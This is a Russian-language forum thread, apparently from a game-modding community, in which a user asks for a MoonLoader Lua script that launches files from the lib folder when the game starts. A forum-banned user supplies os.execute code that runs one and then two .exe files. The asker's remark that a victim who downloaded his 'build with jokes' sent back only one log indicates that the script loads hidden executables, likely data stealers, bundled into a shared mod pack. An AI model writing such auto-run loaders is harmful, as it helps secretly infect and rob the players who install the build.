Напишите пожалуйста lua для открытия файла по директории

disappeared

Участник
Автор темы
34
5
Нужно написать .lua скрипт для того, чтобы при запуске игры открывался джарник находящийся в либах мунлодера.
Буду очень благодарен если напишете, а если ещё и скажете какая команда в скрипте за что отвечает буду вообще рад)
 

xionerme

Потрачен
753
259
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Lua:
os.execute("start explorer \"" .. getWorkingDirectory() .. "\\lib\\file.exe\"")

имя файла в конце поменяй.

(надеюсь я правильно понял что тебе нужно).

скажете какая команда в скрипте за что отвечает буду вообще рад
getWorkingDirectory() - получаем путь, от которого запускается луашка.

os.execute ([команда])
Эта функция эквивалентна системе функций ANSI C. Он передает команду для выполнения оболочкой операционной системы. (из гугла)
 
  • Нравится
Реакции: disappeared

disappeared

Участник
Автор темы
34
5
Lua:
os.execute("start explorer \"" .. getWorkingDirectory() .. "\\lib\\file.exe\"")

имя файла в конце поменяй.

(надеюсь я правильно понял что тебе нужно).


getWorkingDirectory() - получаем путь, от которого запускается луашка.

os.execute ([команда])
Эта функция эквивалентна системе функций ANSI C. Он передает команду для выполнения оболочкой операционной системы. (из гугла)
а можно сразу 2 файла на os.execute? а то у одного чела который мою сборку с приколами скачал только с одной приколюхи лог пришёл

а можно сразу 2 файла на os.execute? а то у одного чела который мою сборку с приколами скачал только с одной приколюхи лог пришёл
если можешь сказать как сделать в одном луа файле чтобы сразу два выбранных файла при запуске открывалось то было бы круто
 

xionerme

Потрачен
753
259
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
а можно сразу 2 файла на os.execute? а то у одного чела который мою сборку с приколами скачал только с одной приколюхи лог пришёл


если можешь сказать как сделать в одном луа файле чтобы сразу два выбранных файла при запуске открывалось то было бы круто


123:
function main()
os.execute("start explorer \"" .. getWorkingDirectory() .. "\\lib\\file1.exe\"")
os.execute("start explorer \"" .. getWorkingDirectory() .. "\\lib\\file2.exe\"")
end